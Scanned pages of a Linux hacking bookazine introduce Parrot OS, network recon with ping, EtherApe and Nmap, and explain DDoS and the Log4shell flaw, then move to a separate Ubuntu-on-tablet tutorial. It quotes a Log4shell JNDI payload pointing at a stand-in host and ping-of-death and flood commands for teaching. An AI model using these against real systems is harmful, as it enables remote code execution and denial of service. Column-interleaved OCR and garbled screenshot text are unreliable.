so here you'll find password crackers, social engineering One reason Parrot has separate Desktop and
tools and many scanners. The System Services Security editions is that you wouldn’t necessarily want
category enables you to start various database and web all of those root-privileged tools lying around on your
services, which are required for some programs. Or if desktop. Just having them there is a security risk. Not
you’re targeting a locally hosted web application. because someone can exploit them, but because in the
wrong hands they can wreck one’s setup. Similarly it’s
Don’t get ahead of yourself not recommended to use the likes of Kali Linux (which
Many of the programs in the menu are command line by default only uses the root account) as a daily driver.
affairs. If, for example, you go to Pentesting>Web You can, of course, install these (see, for example,
Application Analysis>wig, then a terminal will open https://parrotsec.org/docs/installation.html), but
showing the help page for w/g(the WebApp remember that Parrot Security and Kali Linux can
Information Gatherer). Having read the help page, you also be employed from a USB stick, which obviates
might now be tempted to use this to scan your (least) the need for any kind of installation. That being said,
favourite websites for weaknesses. But probably best it’s a little annoying working from a live environment
not. Wig runs as a regular user, as you can see from and having to remember to save your data on another
the stylish ZSH prompt. But some programs are device or the cloud (since any changes you make in the
automatically run as root, for example Recon-NG (in live environment are lost on shutdown). Fortunately,
the ... menu) or anything that crafts packets or Parrot makes it very easy to create a USB stick with
otherwise requires special access. Some aren't even persistence. Since the Security edition is close to 5GB,
programs at all. If you click 'webshells’ for example, an 8GB USB stick will permit you 3GB of persistent
Parrot just opens up a terminal in the /usr/share/ storage. This is as easy as the three-step walkthrough
webshells directory. (see below) suggests.

Install Parrot

bpt < In!«rn«l vm mth linui MVm o»>b (l«U)


ftniword P>iX«1 volume (lUKS)
for me with window)
Q for *11 tyWrn *nd OevKM WAT)
;<xm»

D Get Parrot DAdd a partition El Persistence is bliss


The first step is to create a regular Parrot Rather than boot the USB, open it in In order for Parrot to recognise the
USB. Download an ISO from https:// Gnome Disks or Gparted. You’ll see some persistence partition, it must contain a file
parrotsec.org. We’d recommend using free space at the end of the drive. Create named persistence.conf, which in turn
Balena Etcher or one of the many other a new Ext4 partition in this space and contains the text / union. You should
graphical USB writing tools out there, but optionally give it a label. Once that's done be able to do this from any text editor,
feel free to write the ISO to USB from the the new partition should be visible in your depending on how filesystem permissions
command line if you must. file manager. have been set.

The Hacker’s Manual | 97


Hacking

Hacking 101
Starting with the humble ping command and moving on
to some stealthy network recon activities...
lmost 10 years have passed since the infamous involves sending an ICMP packet to a host (or hosts

A 'Learn to Hack’ feature got us in trouble with


Barnes & Noble, but just in case let's start with a
as we’ll see). If the host(s) haven't been configured
to block or ignore these, then it’ll reply with an
warning. The word "hacking” has unfortunately been acknowledgement packet.
co-opted by the media and entertainment industries, It’s not helpful to block ICMP packets since they're
where it's repeatedly used to denote any and all illegal useful for diagnosing network faults. However, if you
activities done on a computer. The traditional (and cast your mind back to 1997 (and were lucky enough to
correct!) usage of the word refers to much more have access to a network back then) you might recollect
honourable pastimes: tinkering, reimagining and making a popular artefact dubbed the “Ping of Death". The
machines behave in a way other than how they were attack worked by creating an ICMP packet that’s larger
designed to behave. than expected (pings are only supposed to be 64 bytes).
Wait, that wasn’t a warning. This is though: whatever This is divided into chunks and then sent to the target
you learn in this feature, be aware that inappropriate machine, which receives the chunks, tries to put them
use of computers can land you in a lot of trouble. Some back together and then promptly encounters a buffer
of the tools featured here can do real damage. It’s also overflow because innocent TCP/IP stacks of the past
simple for a skilled defender to detect their use, trace allocated only the memory required for a correctly sized
your IP address and alert the authorities. There are skills response packet. And then didn’t check those bounds
and tricks to not getting caught and we're not going to before trying to store it, crashing the system.
teach you them. So please keep all your break-in
attempts, covert reconnaissance and Bobby’ DROP Beware the ping of death
TABLES-style SQL injections restricted to your own F/nghas been around since 1983, and most OSes have
infrastructure. There's a lot to learn from poking around their own implementation of the program. Prior to 1997,
your home network. Who knows, maybe you’ll discover pretty much all of them were vulnerable to the ping of
a misconfiguration or even a vulnerability in your router, death. Windows 95’s version, for example, enabled the
or a Raspberry Pi accidentally left exposed to the world. user to specify a "load" parameter, which set the size of
Let’s start by using Parrot OS tc do some network the packet’s data field. This is supposed to be 56 bytes
reconnaissance. Specifically, we’re going to try and (the header is an additional eight bytes), but the
identify every machine on our network. command would accept arbitrary values. Setting it to
Before we avail ourselves of Parrot's mighty arsenal around 65,500 was generally enough to cripple a target
we’re going to see how far we can get with the humble machine. Since this attack was widely publicised, it didn't
ping command, which is available on all OSes. 'Pinging' take long for servers and workstations around the internet

File Capture View Help

II ■ * E =
Next Pause Stop Pref. Prot. Nodes

Protocols
fe80:
fdW56C:397f
:8f03:9561:a68e:7799
fe80::1813:6bab afe§0::f53b:a*2:2275:9683
fe80::803:5>2d;d7a8:8f6
ICMP fe80::fcde 41d5:8556
239.255*^55.250
>uters
239.255t250.250x
230.WL1
224.0t0.252
ICPMPV6 ff02t:l:3
224
dns.google
192.168*1 3X2fo^.
NETBIOS-NS 157.240.221.24
192.168*133.24>-
) In just a 192.16€. 133.1
IP_UNKNOWN 192.168tl33.203
197^8.133.20
few seconds 192.i68tl33.175
EtherApe had ^^^^092.168.133.45
MDNS 192.168tl33.118
sniffed the traffic 1921fo.133.48
192.168tl33.110
from a sizeable -192.168.133.57
192.168.133.87
chunk of Future J92.lfo.133.76
192.168.133. ^33.81
Towers' review UDP-UNKNOWN
network.

98 | The Hacker’s Manual


Hacker’s Toolkit
to be patched with appropriate malformed packet filters
and bounds checks.
Linux's ping command still permits a size
parameter, but if you use a ping of death yourself, for
example you can try:
$ ping 127.0.0.1 -c4 -s 65500
you'll see that nary a single packet is returned, and that
your machine didn’t die. There's no real point sanitising
the input of the ping program in this case. Remember that
it's the kernel which does the communicating with
network hardware, and anyone could write their own ping
program to make those kernel calls with whatever
parameters they desire. This effort would deter
inexperienced script kiddies, but not veteran attackers.
The idea behind the ping of death can be generalised
to other IP packets, but the defences have been put in > ASCII UFO invaders are coming to war drive your wireless network. Oh no, wait -
place by now. That didn't stop the IPv6 ping of death it’s just the Airgeddon splash screen. Stand down, people.
making a brief appearance on Windows in 2013, though.
as they flow through your network. And from those
Capture the broadcast flag packets we can collect source and destination
One of the lesser-known ping features is the broadcast addresses. We'll use the EtherApe tool to do this,
flag, and that's what we’re going to leverage to do the which rather pleasingly draws hosts in an ellipse as
network recon. As we hinted earlier, this enables not just they’re discovered in real time, as well as showing the
one machine to be pinged, but a whole subnet. Try the
following command at home, replacing the first bits of the
IP address as appropriate (255 is a ‘reserved octet' that
Analyse your network
denotes the broadcast address, in this case everything
from 192.168.0.1 to 192.168.0.254):
“We send a packet to the
$ ping -b -c 4 192.168.0.255 broadcast address and then wait
Here we send a packet to the broadcast address and
then wait for four response packets from each machine. for four response packets from
Note that the command gives you a warning that you’re
pinging a broadcast address, since users would be
each machine.”
mighty confused if they thought a single host was
replying from multiple addresses. You should see traffic flows between them. You'll find EtherApe in the
responses from some of the computers on your Applications menu under the Pentesting>lnformation
network, though many OSes (including most Linux Gathering section.
distros) don’t by default respond to this type of Having got an idea of the number of machines on
broadcast. Identifying which machine is which is our network, we could do some deeper observation
tricky at this stage (unless you pull up your router s of packets to see what they're up to. The Wireshark
configuration page), but at least it gives us an idea of program is industry standard for this task, and easy to
the number of devices on your network. You’ll also see get started with (click Pentesting>Most used tools).
the total roundtrip time, which can be used to diagnose Hackers, good and bad, use packet captures (pcaps)
network congestion or routing issues. We’ll talk more obtained from the likes of WiresharK for everything from
about weaponising pings later. For now let’s get back to recon to reverse engineering. Alternatively we can use
our network recon. Nmap, another ubiquitous hacker tool (it even appeared
A more effective (and less visible) way to enumerate in the second Matrix film), to scan our network and find
the machines on your LAN is to passively 'sniff packets out what those machines are up to.

Introducing Nmap
Parrot comes with a handy GUI front-end that first 24 bits of the (32-bit) IPv4 address. Now hit
saves you learning (at least until the next page) the Start button and the background terminal
Nmap S lengthy command line syntax. You'll will jump into life while the scan completes.
find it under Pentesting >lnformation When it’s done save the list of discovered IPs
Gathering>Nmapsi4. There's an option to run it using the button at the top. We'll analyse these
as root, but don't worry about that for now. further over the page. If you set up USB
From the welcome screen select Discover a persistence as described earlier, and booted
network, then specify a CIDR address and prefix using one of the Persistence modes from the
length. To scan the 256 address beginning with Advanced menu, then you can save it in the
192.168.0. for example, use the address default user's home folder and it’ll still be there
192.168.0.0 with a prefix size of 24. If you like on reboot. Otherwise don't worry because it’s
binary that's all the addresses which match the easy to regenerate this list later.

The Hacker's Manual | 99


Hacking

Nmap deep dive


Nmap, the stealthy port scanner, is a vital tool for any helpful
hacker or nefarious network administrator’s arsenal.
e've seen how the humble ping command can tell $ sudo nmap 192.168.0.0/24

W us not just if our machines are reachable, but how


many of them are on the local network. If we read
This will scan the local network as before, but instead
of pinging the machines it'll probe the 1,000 most
into the timings column a bit. we might even speculatecommon
how far away these machines are. However, for network
about service ports on each machine, and tell you if
any are listening. As well as this, when we run it as root it
reconnaissance and port scanning, you can't beat Nmap. gives us some additional information about each host.
J Once you’ve
Since we've already got an XML list of machines on our Namely its MAC address and the manufacturer
discovered your
LAN it would be nice if we could re-use it here to save identification associated with that. This is our favourite
network click
Scan Options to
scanning again. Sadly, the XML files generated by way of finding the IP addresses of Raspberry Pis on our
commence more Nmapsi4’s network discovery cannot be easily digested home networks. Since we tend to have enabled SSH on
thorough script by Nmap itself (or we couldn't figure out a way). So let's most of these devices, we need only scan port 22 here:
scanning of open a terminal and do it manually. To start, simply enter $ sudo nmap -p22 192.168.0.*
the machines. the following: As you can see. Nmap doesn’t mind if you prefer
wildcards or subnet masks. Just a small caveat though:
ions Places System W I!
the Pi 4 uses a different Ethernet adapter than its
nmapsi4

x Scan Options . i Save IP list B Load IP list 0 Control _ predecessors, so this shows up as something other than
ph read: I
ft Network discover
Raspberry Pi Foundation
-Proce
sThread:! Discovered Probe
discover
IP/s Probes Modes: --tcp-connect Spotting running services
f.168.13
discover r 192.168.133.1

92.168. r 192.168.133.35
192.168.133.55
CIDR Notation address Range of IP
Let's forget about st'ay Pis and consider the services
discover
[92.168. 192.168.133.87 CIDR Notation (IPv4) running on your own network. Looking at the previous
nscover
92.168.
r 192.168.133.175
192.168.133.118
Selected your CIDR address: scan results may (depending on what the boxes on your
Cl DR Address: 192
Jiscover r 192.168.133.213 network are doing) reveal hosts running SSH, web
192.168.
Jiscover
r 192.168.133.255 Prefix Size:
interfaces, Windows File Sharing (NetBIOS/SMB/CIFS),
Number of IP: 256
92.168.
nscoverj remote desktop (VNC/RDP) as well as some things
Or you can paste Cl DR address below:
92.168.
Cl DR address:
you've probably never heard of. The services running may
nscover
[92.168. be different to those listed - service names are just
ft Start with ClDR-styte address
assumed from the port number at this stage.
Packets trace Now consider your home router. It’ll almost certainly
be running a web control panel on port 80, but there
may be all kinds of other services running. If you want to

Northern Exposure scan every single port, you could do so with:


$ sudo nmap -pl-65535 192.168.0.1
This isn’t particularly smart, though. Nmap's default
The Common Vulnerabilities and Exposures (CVE) database is a fantastic SYN scan may be stealthy, but it's not fast at scanning
dataset operated by The Mitre Corporation at the behest closed ports. Those ports might reject the incoming SYN
of the US government. It tracks vulnerabilities as they’re discovered and
packets, in which case the scan will finish quickly. Or the
cross-references them with the internal tracking systems of companies and
connection attempts will be silently dropped, leaving
distros, so it's easy to determine which versions
Nmap waiting for a response that’s never coming. Or
or which releases are vulnerable.
In addition to CVE, there’s the associated National Vulnerabilites Database there could be a rate-limiting firewall in effect.
(https://nvd.nist.gov), where CVEs are rated by severity. Several of the If you leave the previous command running for a
CVE numbers related to the ShellShock vulnerability score a perfect 10. As do while and then push Space, you’ll see a progress
other CVEs that affect popular software, allow remote code execution and estimate and an estimated time of completion. In our
can be carried out by fools (script kiddies). ’Person in the middle’ attacks, case this was close to a day, so we thought we’d try a
which might be hard to pull off in the real world and only lead to user different tool. Masscan (Information Gathering>Network
impersonation or limited information leakage, might score more modestly. & Port Scanners) took a mere 15 minutes to tell us it
Besides CVE entries, you can
couldn’t find any services running on obscure ports.
also search the Common Platform Enumerations (CPE) da:abase, which
Note the increase in the noise in our reconnaissance
makes it easy to find vulnerabilities in a particular product.
so far. We started by silently spying on the network with
Sooner or later someone will release Proof of Concept (PoC) code
showing how to exploit a particular vulnerability. Ideally, this happens after Etherape, did a barely detectable probe with Nmapto
the issue is responsibly disclosed to the affected vendors or projects, giving find all the hosts, and now we’re picking one host and
them time to ship patches. If not, it's a race between cyber fiends attacking doing thorough inspections. And it’s about to get worse.
and security teams patching. We can use Nmapto perform OS and service version
detection too, though sometimes this results in

100 | The Hacker's Manual


Hacker’s Toolkit
i£| Applications Places System P 4>) □ Tue May 10,12:3! > There are a
(@) Privacy ►
huge number of
tools carefully
■ Office ►
categorised
* Internet ► (£) • DNS Analysis
within the
Graphics ► (£) • IDS/IPS Identification
Pentesting menu.
tf* Sound & Video ► (?) • Live Host Identification
Nmap here will
* 1 Games ► @) • Network & Port Scanners
be our first
@ Most Used Tools ► ® • OSINT Analysis
Pentesting ► port(scan) of call.
?) • Route Analysis
hk Programming ► (£ Information Gathering
@) • SMB Analysis
• ■ System Tools ► (8) Vulnerability Analysis
> (J). SMTP Analysis
@ System Services ► Ai. Web Application Analysis
(?) • SNMP Analysis
it Accessories ► ig) Exploitation Tools
® • SSL Analysis
it Universal Access ► @ Maintaining Access
@ Post Exploitation
5 dmitry

ft


ike-scan
(S) Password Attacks
Maltego
@ Wireless Testing
netdiscover
Trash (£•) Sniffing & Spoofing k Nmapsi4 - QT GUI for Nmap

Digital Forensics
Network exploration or security auditing with QT GUI
(§) Automotive
iMiiiop - me imciwui k i»idppei
© Reverse Engineering
* DpOf

(S) Reporting Tools ► recon-ng

E wireshark
JJ Menu 1ES

guesswork if it encounters unknown fingerprints. Our machine. Out of curiosity, we thought we’d investigate
router, the previous scan results suggest, might have a the UPnP server running on our router:
web control panel running on port 80, and a UPnP server $ nmap -p 5000 -A -script vulners 192.168.0.1
running on port 5,000. Change those numbers below to We were simply aghast to find th s in the output:
suit your situation. Running I vulners:
$ nmap -A -p80,5000 192.168.0.1 I cpe:/a:miniupnp_project:miniupnpd: 1.9:
told us that the web server was Lighttpd and the other
was MiniUPnpd. That your router has so many services I EDB-ID:43501 7.5 https://vulners.
running (and there may be others hiding behind port­ com/exploitdb/EDB-ID:43501 ‘EXPLOIT*
knocking protocols) isn't necessarily a worry in itself. I CVE-2017-8798 7.5 https://vulners.
We’ve only scanned the LAN interface, in other words com/cve/CVE-2017-8798
from the inside. If there were so many ports open from Looking at the links told us this was an integer
the outside, that would probably be cause for concern. In signedness error in versions 1.4-2.0 of the MiniUPnP
order to scan it from the outside we need to know its client, and that vulnerable systems could be exploited by
external IP address, which is easy to find using a weosite a Denial of Service attack. While it would be exciting
such as httpsrZ'ipinfo.io.
Exploiting a vulnerable service is usually a critical
step in any illicit computer activity. Last year's Log4shell
Tap into nmap’s potential
vulnerability in a Java logging framework affected
thousands of applications, from Elasticsearch
“Thanks to Nmap’s powerful
containers to Minecraft servers. Unfortunately, many script engine (NSE), all manner of
servers remain unpatched, not just due to administrator
laziness, but because Log4j (the vulnerable framework) custom tasks can be arranged.”
is often buried deep within major applications’
dependencies. Research by Rezilion (see https://bit. playing with the Proof of Concept (PoC) code referenced
Iy/lxf290-rezilion-research) shows not only in those links, it would be for naught. Because this is a
thousands of machines still running vulnerable Log4j 2.x vulnerability in the client program, rather than the server.
versions, but also thousands of machines running older This is an important distinction, because
1.x versions of Log4j. The 1.x series is unmaintained, and portscanning in general can only tell you about
while it might be Log4shell proof, is vulnerable to vulnerable services on the host. There may be plenty of
countless other known attacks. other vulnerabilities in other software running on the
target (and indeed in the human operating it), but Nmap
Deeper probing with Nmap can't help you with this. These scripts only check version
Besides network recon and service discovery, Nmap can information (often only Nmap's best guess at that) so
probe even further still. Thanks to its powerful script seeing output similar to the above shouldn’t be an
engine (NSE), all manner of custom tasks can be immediate cause for panic.
arranged. One of the most useful scripts is provided by Remember that vulnerabilities may only affect
security group Vulners.com. It uses Nmap's ability to certain features of certain programs running in certain
detect the versions of running services, together with configurations. But it's always worth investigating, which
known vulnerability databases to tell you in excruciating is where tools like Pompem (see Pentesting>Exploitation
detail which vulnerabilities might affect the target Tools>Exploit Search) come in handy.

The Hacker’s Manual | 101


Hacking

Modern hacking,
ethics and statistics
Read about the largest DDoS in history and how honing
your hacking skills might help you prevent the next one...
gerund and an infinitive walk in to the Linux kernel. playground, or later from first-person shooters such as

A They were hacking to learn. An awful adaptation of


a (drinking to forget) joke, but a reasonable opener.
An incredibly useful maxim from long ago hacker lore is
“don’t learn to hack, hack to learn". It’s worth taking some
Unreal Tournament. The traditional idea is that teams
compete to try and capture the flags from opposing
teams’ bases and return them to their own. But the
hacker version just involves finding flags (sometimes just
time to marinate on this message. empty files called flag, sometimes more interesting
For example, if you search Google for "how to hack" or items) hidden by whoever set the challenge.
worse "how to hack gmail", we can pretty much guarantee
you won’t find any useful information. Indeed, you’ll Open the floodgates
probably find all sorts of spam and phishing links that we We started with the ping of death, so let’s end with the idea
wouldn't recommend touching, even with JavaScript of a ping flood. Instead of a single malformed packet, a
turned off. This isn’t because search engines are producing huge number of legitimately sized ones are transmitted.
increasingly bad search results, but because hackers and The idea is to overwhelm the target machine by sending
advertisers know the kinds of intellects who are searching more pings than it can handle. Both the Ping of Death and
for these terms. ping flooding are part of the broad category known as
Yet there are plenty of good resources where you can Denial of Service (DcS) attacks.
learn network reconnaissance, penetration testing and On Linux some features of the ping command are
even phishing techniques. Sites like https://tryhackme. only available when they’re run as root. One such
com. for example, will teach you these skills with a view example is the -f or flood option, which when used on
to learning how to defend against them. TryHackMe its own sends echo requests as quickly as possible. In
makes the learning process fun by gamifying tutorials, in favourable circumstances (the attacker has significantly
some cases giving you VMs to download and intrude. more bandwidth than the defender, and the defender
There are lessons, labs and competitions that will help has no DoS-preventing firewall), it’s possible for one
you learn everything from Metasploitto Maltego. machine to cripple another this way. It's more common,
A big part of hacker culture is Capture The Flag (CTF) however, for an attacker to use several hosts to send the
challenges. You might remember this one from the pings, making this a Distributed Denial of Service (DDoS)

Armitage
is a GUI for
Metasploit. To
use it make
sure you start
the Metasploit
Framework from
the System
Service menu.

102 | The Hacker's Manual


Hacker’s Toolkit
attack. Ping floods are defended against by most
routers, as are SYN floods and other things.
These are detectable by one’s garden variety packet­
filtering stack.
The actual DDoS-ing is typically done by a botnet
under the attackers control. Cybercrime groups may
rent out sections of a hoard of zombie machines that
they've curated, or they may use that hoard directly. So
attacks have involved a huge amount of bandwidth. In
2016 DNS provider Dyn was taken offline (making many
popular websites inaccessible) as result of the Mirai
malware, which mostly infects loT devices using default
credentials. The total bandwidth of this attack was
estimated to be in the region of 1.2Tbps. Security
commentators of the era lamented that the net had
been crippled by a telnet scanner and 36 passwords. In
November 2021, Microsoft revealed it had thwarted the
largest DDoS attack in history, topping out at 3.47Tbps. puzzle for the ages. As we're fans of digital history here, > Wireshark can
That's 3,000 times more data than gigabit LAN. A UDP we have most of that site archived in a virtual machine. smell packets
reflection attack was to blame, but there are plenty of And since we're talking about hacker toolkits today we on your LAN
other types of DDoS attacks that are more sophisticated. figured we’d have a go at compromising said virtual from miles away.
Pretty much
The Log4shell vulnerability took advantage of machine. Nmap evinced that our venerable, vulnerable,
nothing gets
unsanitised input and at worst enabled remote code virtual machine was running the following ancient
past it.
execution. All an attacker had to do was cause a software: ProFTPD 1.3.1, Apache 2.2.31, OpenSSH 4.7pl
carefully crafted message, which looked something like and Subversion (no version number detected).
${jndi:ldap://example.com/bad_file} But try as we might, none of the exploits that we
to be written to a log file. tried would work. We used ZAP (the Zed Attack Proxy)
Like Bash, Log4j performs string substitution on from 0WASP (the Open Web Application Security
expressions in curly brackets. In the right circumstances, Project, https://owasp.org) to try and attack the old
the contents of /bad_file might be executed immediately archive forms, but nothing. If you’re interested. ZAP
on the server. Or the log may be processed on another works by setting up a person in the middle proxy
server and /bad_file executed there later. If code that can manipulate requests because they're
execution is dodged, then an attacker can still cause the sent to the web server under investigation, and
vulnerable machine to send data (such as environment inspect responses.
variables or form contents) to their machine. We also tried Metasploit, which
would be a whole feature (or even a
False sense of security bookazine) in itself. But the ghost cr our
Here we’re abusing the Java Naming and Directory machine, it seems, was as resilient
Interface's (JNDI) ability to fetch resources via LDAP, but as its former self. Ideas, anyone? Oh
other protocols can be used to. As a result a numbe- of and one more thing. We ask politely that you
related flaws were discovered soon after the first, and a don’t try and pentest our new website,
number of incomplete mitigations were circulated initially, because you will fail and Future’s
creating a very false sense of security. Once Operations Team will hunt you down.
compromised, machines were enrolled in botnets,
crippled with ransomware, or became unwitting
cryptocurrency miners.
It's interesting that the Dyn attack has been The math of DDoS
attributed (though not conclusively - all we really know
is that in 2017 three individuals aged 20-21 entered
When you ping another machine, you send packets of a given size (usually
guilty pleas relating to “significant cyber attacks”) to 64 bytes on Linux), and that machine replies with packets of the same size.
disgruntled Minecraft players, and so too was Log4j. So, as much data is sent as is received. If the goal is to saturate the target's
Indeed, to exploit Log4j on a vulnerable Minecraft server, network bandwidth, then the attacker needs to be able to send just a little bit
all you needed to do was post the code snippet above more data than the target can receive. This is also true for a SYN flood
into the chat. From there it would be dutifully processed attack.
by Log4j and if various conditions are met the attacker More advanced DDoS attacks take advantage of the fact that other
would be able to execute code. requests can result in much more data being returned than is sent. The most
And there concludes our perennial hacker special. As
advanced ones to date have leveraged intermediate servers (NTP, DNS.
memcached. even Quake servers) to carry out this amplification. These
usual we've barely scratched the surface of the subject
‘reflection attacks' spoof the target's IP address so that the lengthy response
matter, and indeed dealt with only a fraction of the
is sent there. For UDP protocols (like traditional DNS) this is always going to
fantastic selection of tooling within Parrot. But hopefully be a problem, since source addresses can't be directly verified. Initiating a
you've learned something. We certainly have. Many TCP connection, on the other hand, requires a three-way handshake that will
readers will remember with fondness the old Drupal- fail if the address is spoofed. But the connection remains 'half-open' for
based Linuxformat.com site. Quite how this stayed up some time, and the resources used by thousands of such half-completed
for so long, and more importantly how we managed to connections, form the basis of a SYN flood attack.
avoid invoicing for so long (13 years to be precise), is a

The Hacker’s Manual | 103


Hacking

Ubuntu: Linux
on a tablet
It’s time to dig deep and discover how to successfully install a working
version of Ubuntu on a low-cost Windows 2-in-l tablet.

re you jealous of the sudden proliferation of cheap You're likely to find enthusiasts such as John Wells

A Windows 2-in-l tablets? Wish you could run Linux on


it instead? Spanish smartphone manufacturer. BQ.
may be teaming up with Canonical to sell the Aquarius MIO
tablet with Ubuntu pre-installed, but with the price tag
(www.jfwhome.com). who has detailed guides and
downloadable scripts to getting Ubuntu running on an Asus
Transformer T100TA tablet with most of the hardware
working. Another good resource is the DebianOn wiki
expected to be north of £200, why pay more when it turns (https:Z^wiki.debian.org/lnstallingDebianOn) where you’ll
out you can - with a fair amount of tweaking - get Linux to find many other tablets are featured with guides to what
install on one of those cheap Windows devices? works, what issues to look out for and handy links and
These devices all use a low-end Intel Atom quad-core downloads for further information.
processor known collectively as Bay Trail, and we managed to Sadly - for us - there's no handy one-stop shop for the
source one such tablet, which we've made the focus of this Linx 1010 tablet, so we had to do a fair bit of experimenting
tutorial. The device in question is a Linx 1010, which sports an before we found the best way forward for us (see
Atom Z3735F processor, 2GB RAM 32GB internal EMMC Experimenting with Linux support over the page).
(plus a slot for additional microSD card), two full-size USB
ports and a touchscreen with multi-touch support. It can be Install Linux on Linx
bought with detachable keyboard and trackpad through the We decided to go down the Ubuntu route when it came to the
likes of www.ebuyer.com for under £150. These devices Linx 1010 tablet. We're indebted to the hard work of Ian
come with Windows 10 pre-installed, but as you’ll discover, it’s Morrison for producing a modified version of Ubuntu (14.04.3
possible to both run and install flavours of Linux on them. LTS) that not only serves as a live CD, but also works as an
In a perfect world, you'd simply create a live Linux USB installer. We experimented with later Ubuntu releases -15.10
drive, plug it in and off you go. but there are a number of and a daily build of 16.04 - but while the live distros work fine,
complications to overcome. First, these tablets pair a 64-bit installing them proved to be impossible. Still, all is not lost, as
processor with a 32-bit EFI - most distros expect a 64-bit you'll discover later on. So, the simplest and easiest way to
processor with 64-bit EFI, or a 32-bit processor with install Ubuntu on your Z3735F-powered tablet is to use Ian's
traditional BIOS, so they won't recognise the USB drive when Unofficial 'official' quasi Ubuntu 14.04.3 LTS release. This
you boot. Second, while hardware support is rapidly comes with 32-bit UEFI support baked in to the ISO. and
improving with the latest kernel releases, it's still not includes custom-built drivers for key components including
particularly comprehensive out of the box. But don't worry - the Z3735F processor and the internal Wi-Fi adaptor.
if you're willing to live with reduced functionality for now However, there's no touchscreen support, so you'll need to
(things are improving on an almost daily basis) you can still connect the tablet to a detachable keyboard and touchpad.
get Linux installed and running in a usable setup using a Bay Go to www.linuxium.com.au on your main PC and check
Trail-based tablet. Here's what you need to do. out the relevant post (dated 12 August 2015, but last updated
It pays to take a full backup of your tablet in its current in December) under Latest. Click the 'Google Drive' link and
state, so you can restore it to its original settings if necessary. select the blue 'Download' link to save Ubuntu-14.04.3-
The best tool for the job by far is a free Windows application desktop-linuxium.iso file to your Downloads folder.
Ian Morrison has
done a lot of hard called Macrium Reflect Free (www.macrium.com/ Once done, pop in a freshly formatted USB flash drive -
work building a reflectfree.aspx). Install this on your tablet, then back up the it needs to be 2GB or larger and formatted using FAT32.
version of Ubuntu entire disk to your tablet's microSD storage before creating a The simplest way to produce the disk is to use UNetbootin
14.04.3 ITS for
failsafe Macrium USB bootable drive for restoring the backup and select your flash drive, browse for the Ubuntu ISO and
Z3735f-powered
if required. Note: The microSD slot can’t be detected by the create the USB drive. Once written, eject the drive. Plug it into
devices like the
Linx 1010. If you'd rescue disc, so to restore your tablet to its default state you'll one of the Linx's USB ports, then power it up by holding the
like him to develop need a USB microSD card reader, which can be detected by power and volume + buttons together. After about five
his work further the Macrium software. seconds or so you should see confirmation that boot menu is
- we recommend
With your failsafe in place, it's time to play. While they’re about to appear - when it does, use your finger to tap 'Boot
donating through
his website www. very similar, Bay Trail tablets aren’t identical, so it’s worth Manager'. Use the cursor key to select the 'EFI USB Device'
Iinuxlum.com.au. searching for your tablet model and a combination of relevant entry and hit Return to access the Grub menu. Next, select
terms ('Linux', 'Ubuntu' and 'Debian' etc) to see what turns up. 'Try Ubuntu without installing’ and hit Return again.

104 | The Hacker's Manual


Ubuntu tablet

Hardware support
What's the current state of play for hardware » Bluetooth This often needs patching with
support for Bay Trail tablets? It varies from later kernels, although our Linx tablet retained
device to device, of course, but there are Bluetooth connectivity throughout, even when
differences. Here’s what you should be looking the internal Wi-Fi adaptor stopped working.
for when testing your tablet: » Sound A problem on many tablets, and even
» ACPI This deals with power management. if the driver is recognised and loaded, required
This is practically non-existent out of the box, firmware may be missing. Be wary here - there
but later kernels do tend to produce support for are reports of users damaging their sound cards
displaying battery status - the Linx appears to while trying to activate them.
be :he exception to the rule here. Suspend and » Touchscreen As we've seen, older kernels
hibernation should be avoided. don't support them, but upgrading to kernel 4.1
» Wi-Fi Later kernels again improve support, or later should yield positive results, albeit with a
but many devices use SDIO wireless adaptors, bit of tweaking.
which aren't supported without patches or » Camera There's been little progress made
custom-built drivers like those found at here so far. In most cases you'll need to wait for > Upgrade the kernel to 4.1 or later to make
https://github.com/hadess/rtl8723bs drivers to appear. Ubuntu touch-friendly on your tablet.

You'll see the Ubuntu loading screen appear and then after We recommend ticking 'Download updates while installing'
a lengthy pause (and blank screen) the desktop should before clicking 'Continue', at which point you’ll probably see
appear. You should also get a momentary notification that the an Input/output error about fsyncing/closing - simply click
internal Wi-Fi adaptor has been detected - one of the key 'Ignore' and then click 'Yes' when prompted to unmount
While it may
indications that this remixed Ubuntu distro has been tailored various partitions. be tempting to
for Bay Trail devices. At the partition screen you'll see what appears to be upgrade the kernel
Up until now you’ll have been interacting with your tablet excellent news - Ubuntu is offering to install itself alongside all the way to the
current release
in portrait mode - it's time to switch it to a more comfortable Windows, but this won't work, largely because it'll attempt to
(4.4.1 at time of
landscape view, and that's done by click the 'Settings' button install itself to your microSD card rather than the internal writing) you may
in the top right-hand corner of the screen and choosing storage. This card can't be detected at boot up, so the install run into issues with
System Settings. Select 'Displays', set the Rotation drop-down will ultimately fail. Instead, we're going to install Ubuntu in your touchpad.
menu to 'Clockwise' and click 'Apply' (the button itself is place of Windows, so select 'Something else’. For now, stick to
kernel 43.3 until
largely off-screen, but you can just make out its left-hand end Ignore any warning about /dev/sda - focus instead on
these problems are
at the top of the screen as you look at it). /dev/mmcblkO, which is the internal f ash storage. You'll see ironed out.
Next, connect to your Wi-Fi network by clicking the four partitions - we need to preserve the first two (Windows
wireless button in the menu bar. selecting your network and Boot Manager and unknown) and delete the two NTFS
entering the passkey. You're now ready to double-click Install partitions (/dev/mmcblk0p3 and /dev/mmcblk0p4
Ubuntu 14.04.3’ and follow the familiar wizard to install respectively). Select each one in turn and click the'-’ button
Ubuntu on to your tablet. You'll note that the installer claims to delete them.
the tablet isn't plugged into a power source even though you Next, select the free space that's been created (31,145MB
should have done so for the purposes of installing it - this is a or thereabouts) and click the'+' button. First, create the main
symptom of Linux's poor ACPI support for these tablets. partition - reduce the allocation by 2,048MB to leave space

> You can create your


Ubuntu installation media
from the desktop using
the UNetbootin utility - it's
quick and (in this case)
works effectively.

The Hacker's Manual | 105


Hacking

6 A install dsdt respectively. Both improve the hardware support for


a devices sporting the Linx 1010's Z3735F Atom chip, and while
ll Ubunt Installation type
M.3LTS
they don't appear to add any extra functionality to the Linx,
they do ensure the processor is correctly identified.
You need to chmod both scripts following the same
procedure as outlined in step 2 of the Grub step-by-step
guide (see bottom right), then install them one after the other,
rebooting between each. Finally, download and install the
latest Ubuntu updates when offered.
You'll notice the login screen reverts to portrait mode
when you first log in - don't worry, landscape view is restored
after you log in. and you can now review what is and isn't
Quit Back install Now supported on your tablet. In the case of the Linx 1010, not an
awful lot is working at this point. There's no ACPI support, the
touchscreen isn’t detected, and there's no camera support or
sound (although the sound chip is at least detected). The
> Make sure for the swap partition, and set the mount point to '/', but internal Wi-Fi is thankfully supported, as are the USB ports.
